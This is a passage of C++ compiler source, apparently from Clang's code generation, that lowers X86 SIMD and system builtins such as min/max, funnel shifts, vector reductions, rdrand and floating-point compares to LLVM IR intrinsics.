case X86::BI__builtin_ia32_pminsd256:
case X86::BI__builtin_ia32_pminsq256:
case X86::BI__builtin_ia32_pminsb512:
case X86::BI__builtin_ia32_pminsw512:
case X86::BI__builtin_ia32_pminsd512:
case X86::BI__builtin_ia32_pminsq512:
return EmitX86BinaryIntrinsic(*this, Ops, Intrinsic::smin);
case X86::BI__builtin_ia32_pminub128:
case X86::BI__builtin_ia32_pminuw128:
case X86::BI__builtin_ia32_pminud128:
case X86::BI__builtin_ia32_pminuq128:
case X86::BI__builtin_ia32_pminub256:
case X86::BI__builtin_ia32_pminuw256:
case X86::BI__builtin_ia32_pminud256:
case X86::BI__builtin_ia32_pminuq256:
case X86::BI__builtin_ia32_pminub512:
case X86::BI__builtin_ia32_pminuw512:
case X86::BI__builtin_ia32_pminud512:
case X86::BI__builtin_ia32_pminuq512:
return EmitX86BinaryIntrinsic(*this, Ops, Intrinsic::umin);
case X86::BI__builtin_ia32_pmuludq128:
case X86::BI__builtin_ia32_pmuludq256:
case X86::BI__builtin_ia32_pmuludq512:
return EmitX86Muldq(*this, /*IsSigned*/false, Ops);
case X86::BI__builtin_ia32_pmuldq128:
case X86::BI__builtin_ia32_pmuldq256:
case X86::BI__builtin_ia32_pmuldq512:
return EmitX86Muldq(*this, /*IsSigned*/true, Ops);
case X86::BI__builtin_ia32_pternlogd512_mask:
case X86::BI__builtin_ia32_pternlogq512_mask:
case X86::BI__builtin_ia32_pternlogd128_mask:
case X86::BI__builtin_ia32_pternlogd256_mask:
case X86::BI__builtin_ia32_pternlogq128_mask:
case X86::BI__builtin_ia32_pternlogq256_mask:
return EmitX86Ternlog(*this, /*ZeroMask*/false, Ops);
case X86::BI__builtin_ia32_pternlogd512_maskz:
case X86::BI__builtin_ia32_pternlogq512_maskz:
case X86::BI__builtin_ia32_pternlogd128_maskz:
case X86::BI__builtin_ia32_pternlogd256_maskz:
case X86::BI__builtin_ia32_pternlogq128_maskz:
case X86::BI__builtin_ia32_pternlogq256_maskz:
return EmitX86Ternlog(*this, /*ZeroMask*/true, Ops);
case X86::BI__builtin_ia32_vpshldd128:
case X86::BI__builtin_ia32_vpshldd256:
case X86::BI__builtin_ia32_vpshldd512:
case X86::BI__builtin_ia32_vpshldq128:
case X86::BI__builtin_ia32_vpshldq256:
case X86::BI__builtin_ia32_vpshldq512:
case X86::BI__builtin_ia32_vpshldw128:
case X86::BI__builtin_ia32_vpshldw256:
case X86::BI__builtin_ia32_vpshldw512:
return EmitX86FunnelShift(*this, Ops[0], Ops[1], Ops[2], false);
case X86::BI__builtin_ia32_vpshrdd128:
case X86::BI__builtin_ia32_vpshrdd256:
case X86::BI__builtin_ia32_vpshrdd512:
case X86::BI__builtin_ia32_vpshrdq128:
case X86::BI__builtin_ia32_vpshrdq256:
case X86::BI__builtin_ia32_vpshrdq512:
case X86::BI__builtin_ia32_vpshrdw128:
case X86::BI__builtin_ia32_vpshrdw256:
case X86::BI__builtin_ia32_vpshrdw512:
// Ops 0 and 1 are swapped.
return EmitX86FunnelShift(*this, Ops[1], Ops[0], Ops[2], true);
case X86::BI__builtin_ia32_vpshldvd128:
case X86::BI__builtin_ia32_vpshldvd256:
case X86::BI__builtin_ia32_vpshldvd512:
case X86::BI__builtin_ia32_vpshldvq128:
case X86::BI__builtin_ia32_vpshldvq256:
case X86::BI__builtin_ia32_vpshldvq512:
case X86::BI__builtin_ia32_vpshldvw128:
case X86::BI__builtin_ia32_vpshldvw256:
case X86::BI__builtin_ia32_vpshldvw512:
return EmitX86FunnelShift(*this, Ops[0], Ops[1], Ops[2], false);
case X86::BI__builtin_ia32_vpshrdvd128:
case X86::BI__builtin_ia32_vpshrdvd256:
case X86::BI__builtin_ia32_vpshrdvd512:
case X86::BI__builtin_ia32_vpshrdvq128:
case X86::BI__builtin_ia32_vpshrdvq256:
case X86::BI__builtin_ia32_vpshrdvq512:
case X86::BI__builtin_ia32_vpshrdvw128:
case X86::BI__builtin_ia32_vpshrdvw256:
case X86::BI__builtin_ia32_vpshrdvw512:
// Ops 0 and 1 are swapped.
return EmitX86FunnelShift(*this, Ops[1], Ops[0], Ops[2], true);
// Reductions
case X86::BI__builtin_ia32_reduce_add_d512:
case X86::BI__builtin_ia32_reduce_add_q512: {
Function *F =
CGM.getIntrinsic(Intrinsic::vector_reduce_add, Ops[0]->getType());
return Builder.CreateCall(F, {Ops[0]});
}
case X86::BI__builtin_ia32_reduce_and_d512:
case X86::BI__builtin_ia32_reduce_and_q512: {
Function *F =
CGM.getIntrinsic(Intrinsic::vector_reduce_and, Ops[0]->getType());
return Builder.CreateCall(F, {Ops[0]});
}
case X86::BI__builtin_ia32_reduce_fadd_pd512:
case X86::BI__builtin_ia32_reduce_fadd_ps512:
case X86::BI__builtin_ia32_reduce_fadd_ph512:
case X86::BI__builtin_ia32_reduce_fadd_ph256:
case X86::BI__builtin_ia32_reduce_fadd_ph128: {
Function *F =
CGM.getIntrinsic(Intrinsic::vector_reduce_fadd, Ops[1]->getType());
Builder.getFastMathFlags().setAllowReassoc();
return Builder.CreateCall(F, {Ops[0], Ops[1]});
}
case X86::BI__builtin_ia32_reduce_fmul_pd512:
case X86::BI__builtin_ia32_reduce_fmul_ps512:
case X86::BI__builtin_ia32_reduce_fmul_ph512:
case X86::BI__builtin_ia32_reduce_fmul_ph256:
case X86::BI__builtin_ia32_reduce_fmul_ph128: {
Function *F =
CGM.getIntrinsic(Intrinsic::vector_reduce_fmul, Ops[1]->getType());
Builder.getFastMathFlags().setAllowReassoc();
return Builder.CreateCall(F, {Ops[0], Ops[1]});
}
case X86::BI__builtin_ia32_reduce_fmax_pd512:
case X86::BI__builtin_ia32_reduce_fmax_ps512:
case X86::BI__builtin_ia32_reduce_fmax_ph512:
case X86::BI__builtin_ia32_reduce_fmax_ph256:
case X86::BI__builtin_ia32_reduce_fmax_ph128: {
Function *F =
CGM.getIntrinsic(Intrinsic::vector_reduce_fmax, Ops[0]->getType());
Builder.getFastMathFlags().setNoNaNs();
return Builder.CreateCall(F, {Ops[0]});
}
case X86::BI__builtin_ia32_reduce_fmin_pd512:
case X86::BI__builtin_ia32_reduce_fmin_ps512:
case X86::BI__builtin_ia32_reduce_fmin_ph512:
case X86::BI__builtin_ia32_reduce_fmin_ph256:
case X86::BI__builtin_ia32_reduce_fmin_ph128: {
Function *F =
CGM.getIntrinsic(Intrinsic::vector_reduce_fmin, Ops[0]->getType());
Builder.getFastMathFlags().setNoNaNs();
return Builder.CreateCall(F, {Ops[0]});
}
case X86::BI__builtin_ia32_reduce_mul_d512:
case X86::BI__builtin_ia32_reduce_mul_q512: {
Function *F =
CGM.getIntrinsic(Intrinsic::vector_reduce_mul, Ops[0]->getType());
return Builder.CreateCall(F, {Ops[0]});
}
case X86::BI__builtin_ia32_reduce_or_d512:
case X86::BI__builtin_ia32_reduce_or_q512: {
Function *F =
CGM.getIntrinsic(Intrinsic::vector_reduce_or, Ops[0]->getType());
return Builder.CreateCall(F, {Ops[0]});
}
case X86::BI__builtin_ia32_reduce_smax_d512:
case X86::BI__builtin_ia32_reduce_smax_q512: {
Function *F =
CGM.getIntrinsic(Intrinsic::vector_reduce_smax, Ops[0]->getType());
return Builder.CreateCall(F, {Ops[0]});
}
case X86::BI__builtin_ia32_reduce_smin_d512:
case X86::BI__builtin_ia32_reduce_smin_q512: {
Function *F =
CGM.getIntrinsic(Intrinsic::vector_reduce_smin, Ops[0]->getType());
return Builder.CreateCall(F, {Ops[0]});
}
case X86::BI__builtin_ia32_reduce_umax_d512:
case X86::BI__builtin_ia32_reduce_umax_q512: {
Function *F =
CGM.getIntrinsic(Intrinsic::vector_reduce_umax, Ops[0]->getType());
return Builder.CreateCall(F, {Ops[0]});
}
case X86::BI__builtin_ia32_reduce_umin_d512:
case X86::BI__builtin_ia32_reduce_umin_q512: {
Function *F =
CGM.getIntrinsic(Intrinsic::vector_reduce_umin, Ops[0]->getType());
return Builder.CreateCall(F, {Ops[0]});
}
// 3DNow!
case X86::BI__builtin_ia32_pswapdsf:
case X86::BI__builtin_ia32_pswapdsi: {
llvm::Type *MMXTy = llvm::Type::getX86_MMXTy(getLLVMContext());
Ops[0] = Builder.CreateBitCast(Ops[0], MMXTy, "cast");
llvm::Function *F = CGM.getIntrinsic(Intrinsic::x86_3dnowa_pswapd);
return Builder.CreateCall(F, Ops, "pswapd");
}
case X86::BI__builtin_ia32_rdrand16_step:
case X86::BI__builtin_ia32_rdrand32_step:
case X86::BI__builtin_ia32_rdrand64_step:
case X86::BI__builtin_ia32_rdseed16_step:
case X86::BI__builtin_ia32_rdseed32_step:
case X86::BI__builtin_ia32_rdseed64_step: {
Intrinsic::ID ID;
switch (BuiltinID) {
default: llvm_unreachable("Unsupported intrinsic!");
case X86::BI__builtin_ia32_rdrand16_step:
ID = Intrinsic::x86_rdrand_16;
break;
case X86::BI__builtin_ia32_rdrand32_step:
ID = Intrinsic::x86_rdrand_32;
break;
case X86::BI__builtin_ia32_rdrand64_step:
ID = Intrinsic::x86_rdrand_64;
break;
case X86::BI__builtin_ia32_rdseed16_step:
ID = Intrinsic::x86_rdseed_16;
break;
case X86::BI__builtin_ia32_rdseed32_step:
ID = Intrinsic::x86_rdseed_32;
break;
case X86::BI__builtin_ia32_rdseed64_step:
ID = Intrinsic::x86_rdseed_64;
break;
}
Value *Call = Builder.CreateCall(CGM.getIntrinsic(ID));
Builder.CreateDefaultAlignedStore(Builder.CreateExtractValue(Call, 0),
Ops[0]);
return Builder.CreateExtractValue(Call, 1);
}
case X86::BI__builtin_ia32_addcarryx_u32:
case X86::BI__builtin_ia32_addcarryx_u64:
case X86::BI__builtin_ia32_subborrow_u32:
case X86::BI__builtin_ia32_subborrow_u64: {
Intrinsic::ID IID;
switch (BuiltinID) {
default: llvm_unreachable("Unsupported intrinsic!");
case X86::BI__builtin_ia32_addcarryx_u32:
IID = Intrinsic::x86_addcarry_32;
break;
case X86::BI__builtin_ia32_addcarryx_u64:
IID = Intrinsic::x86_addcarry_64;
break;
case X86::BI__builtin_ia32_subborrow_u32:
IID = Intrinsic::x86_subborrow_32;
break;
case X86::BI__builtin_ia32_subborrow_u64:
IID = Intrinsic::x86_subborrow_64;
break;
}
Value *Call = Builder.CreateCall(CGM.getIntrinsic(IID),
{ Ops[0], Ops[1], Ops[2] });
Builder.CreateDefaultAlignedStore(Builder.CreateExtractValue(Call, 1),
Ops[3]);
return Builder.CreateExtractValue(Call, 0);
}
case X86::BI__builtin_ia32_fpclassps128_mask:
case X86::BI__builtin_ia32_fpclassps256_mask:
case X86::BI__builtin_ia32_fpclassps512_mask:
case X86::BI__builtin_ia32_fpclassph128_mask:
case X86::BI__builtin_ia32_fpclassph256_mask:
case X86::BI__builtin_ia32_fpclassph512_mask:
case X86::BI__builtin_ia32_fpclasspd128_mask:
case X86::BI__builtin_ia32_fpclasspd256_mask:
case X86::BI__builtin_ia32_fpclasspd512_mask: {
unsigned NumElts =
cast<llvm::FixedVectorType>(Ops[0]->getType())->getNumElements();
Value *MaskIn = Ops[2];
Ops.erase(&Ops[2]);
Intrinsic::ID ID;
switch (BuiltinID) {
default: llvm_unreachable("Unsupported intrinsic!");
case X86::BI__builtin_ia32_fpclassph128_mask:
ID = Intrinsic::x86_avx512fp16_fpclass_ph_128;
break;
case X86::BI__builtin_ia32_fpclassph256_mask:
ID = Intrinsic::x86_avx512fp16_fpclass_ph_256;
break;
case X86::BI__builtin_ia32_fpclassph512_mask:
ID = Intrinsic::x86_avx512fp16_fpclass_ph_512;
break;
case X86::BI__builtin_ia32_fpclassps128_mask:
ID = Intrinsic::x86_avx512_fpclass_ps_128;
break;
case X86::BI__builtin_ia32_fpclassps256_mask:
ID = Intrinsic::x86_avx512_fpclass_ps_256;
break;
case X86::BI__builtin_ia32_fpclassps512_mask:
ID = Intrinsic::x86_avx512_fpclass_ps_512;
break;
case X86::BI__builtin_ia32_fpclasspd128_mask:
ID = Intrinsic::x86_avx512_fpclass_pd_128;
break;
case X86::BI__builtin_ia32_fpclasspd256_mask:
ID = Intrinsic::x86_avx512_fpclass_pd_256;
break;
case X86::BI__builtin_ia32_fpclasspd512_mask:
ID = Intrinsic::x86_avx512_fpclass_pd_512;
break;
}
Value *Fpclass = Builder.CreateCall(CGM.getIntrinsic(ID), Ops);
return EmitX86MaskedCompareResult(*this, Fpclass, NumElts, MaskIn);
}
case X86::BI__builtin_ia32_vp2intersect_q_512:
case X86::BI__builtin_ia32_vp2intersect_q_256:
case X86::BI__builtin_ia32_vp2intersect_q_128:
case X86::BI__builtin_ia32_vp2intersect_d_512:
case X86::BI__builtin_ia32_vp2intersect_d_256:
case X86::BI__builtin_ia32_vp2intersect_d_128: {
unsigned NumElts =
cast<llvm::FixedVectorType>(Ops[0]->getType())->getNumElements();
Intrinsic::ID ID;
switch (BuiltinID) {
default: llvm_unreachable("Unsupported intrinsic!");
case X86::BI__builtin_ia32_vp2intersect_q_512:
ID = Intrinsic::x86_avx512_vp2intersect_q_512;
break;
case X86::BI__builtin_ia32_vp2intersect_q_256:
ID = Intrinsic::x86_avx512_vp2intersect_q_256;
break;
case X86::BI__builtin_ia32_vp2intersect_q_128:
ID = Intrinsic::x86_avx512_vp2intersect_q_128;
break;
case X86::BI__builtin_ia32_vp2intersect_d_512:
ID = Intrinsic::x86_avx512_vp2intersect_d_512;
break;
case X86::BI__builtin_ia32_vp2intersect_d_256:
ID = Intrinsic::x86_avx512_vp2intersect_d_256;
break;
case X86::BI__builtin_ia32_vp2intersect_d_128:
ID = Intrinsic::x86_avx512_vp2intersect_d_128;
break;
}
Value *Call = Builder.CreateCall(CGM.getIntrinsic(ID), {Ops[0], Ops[1]});
Value *Result = Builder.CreateExtractValue(Call, 0);
Result = EmitX86MaskedCompareResult(*this, Result, NumElts, nullptr);
Builder.CreateDefaultAlignedStore(Result, Ops[2]);
Result = Builder.CreateExtractValue(Call, 1);
Result = EmitX86MaskedCompareResult(*this, Result, NumElts, nullptr);
return Builder.CreateDefaultAlignedStore(Result, Ops[3]);
}
case X86::BI__builtin_ia32_vpmultishiftqb128:
case X86::BI__builtin_ia32_vpmultishiftqb256:
case X86::BI__builtin_ia32_vpmultishiftqb512: {
Intrinsic::ID ID;
switch (BuiltinID) {
default: llvm_unreachable("Unsupported intrinsic!");
case X86::BI__builtin_ia32_vpmultishiftqb128:
ID = Intrinsic::x86_avx512_pmultishift_qb_128;
break;
case X86::BI__builtin_ia32_vpmultishiftqb256:
ID = Intrinsic::x86_avx512_pmultishift_qb_256;
break;
case X86::BI__builtin_ia32_vpmultishiftqb512:
ID = Intrinsic::x86_avx512_pmultishift_qb_512;
break;
}
return Builder.CreateCall(CGM.getIntrinsic(ID), Ops);
}
case X86::BI__builtin_ia32_vpshufbitqmb128_mask:
case X86::BI__builtin_ia32_vpshufbitqmb256_mask:
case X86::BI__builtin_ia32_vpshufbitqmb512_mask: {
unsigned NumElts =
cast<llvm::FixedVectorType>(Ops[0]->getType())->getNumElements();
Value *MaskIn = Ops[2];
Ops.erase(&Ops[2]);
Intrinsic::ID ID;
switch (BuiltinID) {
default: llvm_unreachable("Unsupported intrinsic!");
case X86::BI__builtin_ia32_vpshufbitqmb128_mask:
ID = Intrinsic::x86_avx512_vpshufbitqmb_128;
break;
case X86::BI__builtin_ia32_vpshufbitqmb256_mask:
ID = Intrinsic::x86_avx512_vpshufbitqmb_256;
break;
case X86::BI__builtin_ia32_vpshufbitqmb512_mask:
ID = Intrinsic::x86_avx512_vpshufbitqmb_512;
break;
}
Value *Shufbit = Builder.CreateCall(CGM.getIntrinsic(ID), Ops);
return EmitX86MaskedCompareResult(*this, Shufbit, NumElts, MaskIn);
}
// packed comparison intrinsics
case X86::BI__builtin_ia32_cmpeqps:
case X86::BI__builtin_ia32_cmpeqpd:
return getVectorFCmpIR(CmpInst::FCMP_OEQ, /*IsSignaling*/false);
case X86::BI__builtin_ia32_cmpltps:
case X86::BI__builtin_ia32_cmpltpd:
return getVectorFCmpIR(CmpInst::FCMP_OLT, /*IsSignaling*/true);
case X86::BI__builtin_ia32_cmpleps:
case X86::BI__builtin_ia32_cmplepd:
return getVectorFCmpIR(CmpInst::FCMP_OLE, /*IsSignaling*/true);
case X86::BI__builtin_ia32_cmpunordps:
case X86::BI__builtin_ia32_cmpunordpd:
return getVectorFCmpIR(CmpInst::FCMP_UNO, /*IsSignaling*/false);
case X86::BI__builtin_ia32_cmpneqps:
case X86::BI__builtin_ia32_cmpneqpd:
return getVectorFCmpIR(CmpInst::FCMP_UNE, /*IsSignaling*/false);
case X86::BI__builtin_ia32_cmpnltps:
case X86::BI__builtin_ia32_cmpnltpd:
return getVectorFCmpIR(CmpInst::FCMP_UGE, /*IsSignaling*/true);
case X86::BI__builtin_ia32_cmpnleps:
case X86::BI__builtin_ia32_cmpnlepd:
return getVectorFCmpIR(CmpInst::FCMP_UGT, /*IsSignaling*/true);
case X86::BI__builtin_ia32_cmpordps:
case X86::BI__builtin_ia32_cmpordpd:
return getVectorFCmpIR(CmpInst::FCMP_ORD, /*IsSignaling*/false);
case X86::BI__builtin_ia32_cmpph128_mask:
case X86::BI__builtin_ia32_cmpph256_mask:
case X86::BI__builtin_ia32_cmpph512_mask:
case X86::BI__builtin_ia32_cmpps128_mask:
case X86::BI__builtin_ia32_cmpps256_mask:
case X86::BI__builtin_ia32_cmpps512_mask:
case X86::BI__builtin_ia32_cmppd128_mask:
case X86::BI__builtin_ia32_cmppd256_mask:
case X86::BI__builtin_ia32_cmppd512_mask:
IsMaskFCmp = true;
LLVM_FALLTHROUGH;
case X86::BI__builtin_ia32_cmpps:
case X86::BI__builtin_ia32_cmpps256:
case X86::BI__builtin_ia32_cmppd:
case X86::BI__builtin_ia32_cmppd256: {
// Lowering vector comparisons to fcmp instructions, while
// ignoring signalling behaviour requested
// ignoring rounding mode requested
// This is only possible if fp-model is not strict and FENV_ACCESS is off.
// The third argument is the comparison condition, and integer in the
// range [0, 31]
unsigned CC = cast<llvm::ConstantInt>(Ops[2])->getZExtValue() & 0x1f;
// Lowering to IR fcmp instruction.
// Ignoring requested signaling behaviour,
// e.g. both _CMP_GT_OS & _CMP_GT_OQ are translated to FCMP_OGT.
FCmpInst::Predicate Pred;
bool IsSignaling;
// Predicates for 16-31 repeat the 0-15 predicates. Only the signalling
// behavior is inverted. We'll handle that after the switch.
switch (CC & 0xf) {
case 0x00: Pred = FCmpInst::FCMP_OEQ; IsSignaling = false; break;
case 0x01: Pred = FCmpInst::FCMP_OLT; IsSignaling = true; break;
case 0x02: Pred = FCmpInst::FCMP_OLE; IsSignaling = true; break;
case 0x03: Pred = FCmpInst::FCMP_UNO; IsSignaling = false; break;
case 0x04: Pred = FCmpInst::FCMP_UNE; IsSignaling = false; break;
case 0x05: Pred = FCmpInst::FCMP_UGE; IsSignaling = true; break;
case 0x06: Pred = FCmpInst::FCMP_UGT; IsSignaling = true; break;
case 0x07: Pred = FCmpInst::FCMP_ORD; IsSignaling = false; break;
case 0x08: Pred = FCmpInst::FCMP_UEQ; IsSignaling = false; break;
case 0x09: Pred = FCmpInst::FCMP_ULT; IsSignaling = true; break;
case 0x0a: Pred = FCmpInst::FCMP_ULE; IsSignaling = true; break;
case 0x0b: Pred = FCmpInst::FCMP_FALSE; IsSignaling = false; break;
case 0x0c: Pred = FCmpInst::FCMP_ONE; IsSignaling = false; break;
case 0x0d: Pred = FCmpInst::FCMP_OGE; IsSignaling = true; break;
case 0x0e: Pred = FCmpInst::FCMP_OGT; IsSignaling = true; break;
case 0x0f: Pred = FCmpInst::FCMP_TRUE; IsSignaling = false; break;
default: llvm_unreachable("Unhandled CC");
}
// Invert the signalling behavior for 16-31.
if (CC & 0x10)
IsSignaling = !IsSignaling;
// If the predicate is true or false and we're using constrained intrinsics,
// we don't have a compare intrinsic we can use. Just use the legacy X86
// specific intrinsic.
// If the intrinsic is mask enabled and we're using constrained intrinsics,
// use the legacy X86 specific intrinsic.
if (Builder.getIsFPConstrained() &&
(Pred == FCmpInst::FCMP_TRUE || Pred == FCmpInst::FCMP_FALSE ||
IsMaskFCmp)) {
Intrinsic::ID IID;
switch (BuiltinID) {
default: llvm_unreachable("Unexpected builtin");
case X86::BI__builtin_ia32_cmpps:
IID = Intrinsic::x86_sse_cmp_ps;
break;
case X86::BI__builtin_ia32_cmpps256:
IID = Intrinsic::x86_avx_cmp_ps_256;
break;
case X86::BI__builtin_ia32_cmppd:
IID = Intrinsic::x86_sse2_cmp_pd;
break;
case X86::BI__builtin_ia32_cmppd256:
IID = Intrinsic::x86_avx_cmp_pd_256;
break;
case X86::BI__builtin_ia32_cmpps512_mask:
IID = Intrinsic::x86_avx512_mask_cmp_ps_512;
break;
case X86::BI__builtin_ia32_cmppd512_mask:
IID = Intrinsic::x86_avx512_mask_cmp_pd_512;
break;
case X86::BI__builtin_ia32_cmpps128_mask:
IID = Intrinsic::x86_avx512_mask_cmp_ps_128;
break;
case X86::BI__builtin_ia32_cmpps256_mask:
IID = Intrinsic::x86_avx512_mask_cmp_ps_256;
break;
case X86::BI__builtin_ia32_cmppd128_mask:
IID = Intrinsic::x86_avx512_mask_cmp_pd_128;
break;
case X86::BI__builtin_ia32_cmppd256_mask:
IID = Intrinsic::x86_avx512_mask_cmp_pd_256;
break;
}
Function *Intr = CGM.getIntrinsic(IID);
if (IsMaskFCmp) {
unsigned NumElts =
cast<llvm::FixedVectorType>(Ops[0]->getType())->getNumElements();
Ops[3] = getMaskVecValue(*this, Ops[3], NumElts);
Value *Cmp = Builder.CreateCall(Intr, Ops);
return EmitX86MaskedCompareResult(*this, Cmp, NumElts, nullptr);
}
return Builder.CreateCall(Intr, Ops);
}
// Builtins without the _mask suffix return a vector of integers
// of the same width as the input vectors
if (IsMaskFCmp) {
// We ignore SAE if strict FP is disabled. We only keep precise
// exception behavior under strict FP.
// NOTE: If strict FP does ever go through here a CGFPOptionsRAII
// object will be required.
unsigned NumElts =
cast<llvm::FixedVectorType>(Ops[0]->getType())->getNumElements();
Value *Cmp;
if (IsSignaling)
Cmp = Builder.CreateFCmpS(Pred, Ops[0], Ops[1]);
else
Cmp = Builder.CreateFCmp(Pred, Ops[0], Ops[1]);
return EmitX86MaskedCompareResult(*this, Cmp, NumElts, Ops[3]);
}
return getVectorFCmpIR(Pred, IsSignaling);
}
// SSE scalar comparison intrinsics
case X86::BI__builtin_ia32_cmpeqss:
return getCmpIntrinsicCall(Intrinsic::x86_sse_cmp_ss, 0);
case X86::BI__builtin_ia32_cmpltss:
return getCmpIntrinsicCall(Intrinsic::x86_sse_cmp_ss, 1);
case X86::BI__builtin_ia32_cmpless:
return getCmpIntrinsicCall(Intrinsic::x86_sse_cmp_ss, 2);
case X86::BI__builtin_ia32_cmpunordss:
return getCmpIntrinsicCall(Intrinsic::x86_sse_cmp_ss, 3);
case X86::BI__builtin_ia32_cmpneqss:
return getCmpIntrinsicCall(Intrinsic::x86_sse_cmp_ss, 4);
case X86::BI__builtin_ia32_cmpnltss:
return getCmpIntrinsicCall(Intrinsic::x86_sse_cmp_ss, 5);
case X86::BI__builtin_ia32_cmpnless:
return getCmpIntrinsicCall(Intrinsic::x86_sse_cmp_ss, 6);
case X86::BI__builtin_ia32_cmpordss:
return getCmpIntrinsicCall(Intrinsic::x86_sse_cmp_ss, 7);
case X86::BI__builtin_ia32_cmpeqsd:
return getCmpIntrinsicCall(Intrinsic::x86_sse2_cmp_sd, 0);
case X86::BI__builtin_ia32_cmpltsd:
return getCmpIntrinsicCall(Intrinsic::x86_sse2_cmp_sd, 1);
case X86::BI__builtin_ia32_cmplesd:
return getCmpIntrinsicCall(Intrinsic::x86_sse2_cmp_sd, 2);
case X86::BI__builtin_ia32_cmpunordsd:
return getCmpIntrinsicCall(Intrinsic::x86_sse2_cmp_sd, 3);
case X86::BI__builtin_ia32_cmpneqsd:
return getCmpIntrinsicCall(Intrinsic::x86_sse2_cmp_sd, 4);
case X86::BI__builtin_ia32_cmpnltsd:
return getCmpIntrinsicCall(Intrinsic::x86_sse2_cmp_sd, 5);
case X86::BI__builtin_ia32_cmpnlesd:
return getCmpIntrinsicCall(Intrinsic::x86_sse2_cmp_sd, 6);
case X86::BI__builtin_ia32_cmpordsd:
return getCmpIntrinsicCall(Intrinsic::x86_sse2_cmp_sd, 7);
// f16c half2float intrinsics
case X86::BI__builtin_ia32_vcvtph2ps:
case X86::BI__builtin_ia32_vcvtph2ps256:
case X86::BI__builtin_ia32_vcvtph2ps_mask:
case X86::BI__builtin_ia32_vcvtph2ps256_mask:
case X86::BI__builtin_ia32_vcvtph2ps512_mask: {
CodeGenFunction::CGFPOptionsRAII FPOptsRAII(*this, E);
return EmitX86CvtF16ToFloatExpr(*this, Ops, ConvertType(E->getType()));
}
// AVX512 bf16 intrinsics
case X86::BI__builtin_ia32_cvtneps2bf16_128_mask: {
Ops[2] = getMaskVecValue(
*this, Ops[2],
cast<llvm::FixedVectorType>(Ops[0]->getType())->getNumElements());
Intrinsic::ID IID = Intrinsic::x86_avx512bf16_mask_cvtneps2bf16_128;
return Builder.CreateCall(CGM.getIntrinsic(IID), Ops);
}
case X86::BI__builtin_ia32_cvtsbf162ss_32:
return EmitX86CvtBF16ToFloatExpr(*this, E, Ops);
case X86::BI__builtin_ia32_cvtneps2bf16_256_mask:
case X86::BI__builtin_ia32_cvtneps2bf16_512_mask: {
Intrinsic::ID IID;
switch (BuiltinID) {
default: llvm_unreachable("Unsupported intrinsic!");
case X86::BI__builtin_ia32_cvtneps2bf16_256_mask:
IID = Intrinsic::x86_avx512bf16_cvtneps2bf16_256;
break;
case X86::BI__builtin_ia32_cvtneps2bf16_512_mask:
IID = Intrinsic::x86_avx512bf16_cvtneps2bf16_512;
break;
}
Value *Res = Builder.CreateCall(CGM.getIntrinsic(IID), Ops[0]);
return EmitX86Select(*this, Ops[2], Res, Ops[1]);
}
case X86::BI__emul:
case X86::BI__emulu: {
llvm::Type *Int64Ty = llvm::IntegerType::get(getLLVMContext(), 64);
bool isSigned = (BuiltinID == X86::BI__emul);
Value *LHS = Builder.CreateIntCast(Ops[0], Int64Ty, isSigned);
Value *RHS = Builder.CreateIntCast(Ops[1], Int64Ty, isSigned);
return Builder.CreateMul(LHS, RHS, "", !isSigned, isSigned);
}
case X86::BI__mulh:
case X86::BI__umulh:
case X86::BI_mul128:
case X86::BI_umul128: {
llvm::Type *ResType = ConvertType(E->getType());
llvm::Type *Int128Ty = llvm::IntegerType::get(getLLVMContext(), 128);
bool IsSigned = (BuiltinID == X86::BI__mulh || BuiltinID == X86::BI_mul128);
Value *LHS = Builder.CreateIntCast(Ops[0], Int128Ty, IsSigned);
Value *RHS = Builder.CreateIntCast(Ops[1], Int128Ty, IsSigned);
Value *MulResult, *HigherBits;
if (IsSigned) {
MulResult = Builder.CreateNSWMul(LHS, RHS);
HigherBits = Builder.CreateAShr(MulResult, 64);
} else {
MulResult = Builder.CreateNUWMul(LHS, RHS);
HigherBits = Builder.CreateLShr(MulResult, 64);
}
HigherBits = Builder.CreateIntCast(HigherBits, ResType, IsSigned);
if (BuiltinID == X86::BI__mulh || BuiltinID == X86::BI__umulh)
return HigherBits;
Address HighBitsAddress = EmitPointerWithAlignment(E->getArg(2));
Builder.CreateStore(HigherBits, HighBitsAddress);
return Builder.CreateIntCast(MulResult, ResType, IsSigned);
}
case X86::BI__faststorefence: {
return Builder.CreateFence(llvm::AtomicOrdering::SequentiallyConsistent,
llvm::SyncScope::System);
}
case X86::BI__shiftleft128:
case X86::BI__shiftright128: {
llvm::Function *F = CGM.getIntrinsic(
BuiltinID == X86::BI__shiftleft128 ? Intrinsic::fshl : Intrinsic::fshr,
Int64Ty);
// Flip low/high ops and zero-extend amount to matching type.
// shiftleft128(Low, High, Amt) -> fshl(High, Low, Amt)
// shiftright128(Low, High, Amt) -> fshr(High, Low, Amt)
std::swap(Ops[0], Ops[1]);
Ops[2] = Builder.CreateZExt(Ops[2], Int64Ty);
return Builder.CreateCall(F, Ops);
}
case X86::BI_ReadWriteBarrier:
case X86::BI_ReadBarrier:
case X86::BI_WriteBarrier: {
return Builder.CreateFence(llvm::AtomicOrdering::SequentiallyConsistent,
llvm::SyncScope::SingleThread);
}
case X86::BI_AddressOfReturnAddress: {
Function *F =
CGM.getIntrinsic(Intrinsic::addressofreturnaddress, AllocaInt8PtrTy);
return Builder.CreateCall(F);
}
case X86::BI__stosb: {
// We treat __stosb as a volatile memset - it may not generate "rep stosb"
// instruction, but it will create a memset that won't be optimized away.
return Builder.CreateMemSet(Ops[0], Ops[1], Ops[2], Align(1), true);
}
case X86::BI__ud2:
// llvm.trap makes a ud2a instruction on x86.
return EmitTrapCall(Intrinsic::trap);
case X86::BI__int2c: {
// This syscall signals a driver assertion failure in x86 NT kernels.
llvm::FunctionType *FTy = llvm::FunctionType::get(VoidTy, false);
llvm::InlineAsm *IA =
llvm::InlineAsm::get(FTy, "int $$0x2c", "", /*hasSideEffects=*/true);
llvm::AttributeList NoReturnAttr = llvm::AttributeList::get(
getLLVMContext(), llvm::AttributeList::FunctionIndex,
llvm::Attribute::NoReturn);
llvm::CallInst *CI = Builder.CreateCall(IA);
CI->setAttributes(NoReturnAttr);
return CI;
}
case X86::BI__readfsbyte:
case X86::BI__readfsword:
case X86::BI__readfsdword:
case X86::BI__readfsqword: {
llvm::Type *IntTy = ConvertType(E->getType());
Value *Ptr =
Builder.CreateIntToPtr(Ops[0], llvm::PointerType::get(IntTy, 257));
LoadInst *Load = Builder.CreateAlignedLoad(
IntTy, Ptr, getContext().getTypeAlignInChars(E->getType()));
Load->setVolatile(true);
return Load;
}
case X86::BI__readgsbyte:
case X86::BI__readgsword:
case X86::BI__readgsdword:
case X86::BI__readgsqword: {
